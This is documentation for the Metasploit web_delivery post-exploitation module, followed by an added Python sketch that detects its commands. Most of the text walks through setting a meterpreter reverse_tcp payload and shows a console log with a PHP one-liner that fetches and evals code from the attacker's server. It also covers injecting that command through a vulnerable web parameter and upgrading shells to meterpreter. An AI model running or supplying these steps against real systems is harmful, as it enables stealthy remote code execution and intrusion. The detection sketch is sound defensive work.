metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md
2016-03-02 19:52:11 -06:00


As a web server, web_delivery provides a great way to deliver a payload during post exploitation
while staying stealthy, because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and
PowerShell. You should be able to tell which one you can use based on the target environment
you are in.

For example, if you have gained access through a PHP application, it's safe to assume you can
use PHP. If you're on a Windows server (such as Windows Server 2008), it's probably safe to
say the target supports PowerShell.
## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, with the ability
to execute either the Python, PHP, or PowerShell interpreter.
At that point, you would use web_delivery similar to the following example:
1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run```
7. At this point, a handler is up for that payload, and the module should instruct you to execute
a command.
8. Copy the command. Depending on your pentesting scenario, you can typically either inject the
command to get code execution, or run it from the target's shell, and get a session:
```
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.23.1:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
```
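
Seen from the defender's side, the command printed in the console output above has a recognizable shape: an interpreter started with its inline-code flag, whose inline code names an HTTP URL. The following detection sketch is an added example, not part of the module or its documentation; it generalizes from the PHP command shown to the module's other two interpreters, and the flag table, keyword list, and sample command lines (other than the first) are assumptions constructed for illustration.

```python
import re
import shlex

# Interpreters the module targets, mapped to the flag that runs inline code.
INLINE_FLAGS = {"php": {"-r"}, "python": {"-c"}, "powershell": {"-c", "-command"}}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
EVAL_RE = re.compile(r"\b(eval|exec|iex|invoke-expression)\b", re.I)

# Constructed process-creation log (command lines only). The first entry is
# the command shown in the console output above; the rest are benign.
SAMPLE_CMDLINES = [
    "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));\"",
    'php -r "echo PHP_VERSION;"',
    'python3 -c "print(1)"',
    "python3 fetch.py http://intranet.example/report.csv",
    "/usr/bin/php7.4 -d memory_limit=1G /var/www/cron.php",
]


def classify(cmdline):
    """Return a finding dict if an interpreter runs inline code that names a URL."""
    try:
        argv = shlex.split(cmdline)  # POSIX quoting assumed; Windows logs differ
    except ValueError:
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].rsplit("/", 1)[-1].lower()
    exe = re.sub(r"[\d.]*(\.exe)?$", "", exe)  # php7.4 -> php, python3 -> python
    flags = INLINE_FLAGS.get(exe)
    if flags is None:
        return None
    for i, arg in enumerate(argv[1:-1], start=1):
        if arg.lower() in flags:
            code = " ".join(argv[i + 1:])
            urls = URL_RE.findall(code)
            if urls:
                return {"interpreter": exe, "urls": urls,
                        "evaluates": bool(EVAL_RE.search(code))}
    return None


def scan(cmdlines):
    """Return (index, finding) for every command line that matches."""
    return [(i, f) for i, c in enumerate(cmdlines) if (f := classify(c))]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_CMDLINES):
        print(idx, finding)
```

Because the payload does not touch the disk, process command-line telemetry like this, together with the outbound HTTP fetch it records, is where the activity remains visible.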
## Targets
**Python**
Python is a fairly popular language, especially on Unix-based systems. For example, it has come with
Ubuntu Linux by default since 8.04, as well as with Debian, and with Mac OS X since 10.3.
**PHP**
PHP is a fairly popular language for web servers, especially Apache.
**PowerShell/win**
PowerShell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with PowerShell by default; older systems do not.
## Scenarios
**Against a compromised web application**
web_delivery would work nicely for a web application with a command execution vulnerability.
One way to approach this would be:
1. Start exploit/multi/script/web_delivery
2. Use Burp Suite to intercept the HTTP/HTTPS request, and place the command in the parameter that
results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/paste the command.
3. You should get a meterpreter session.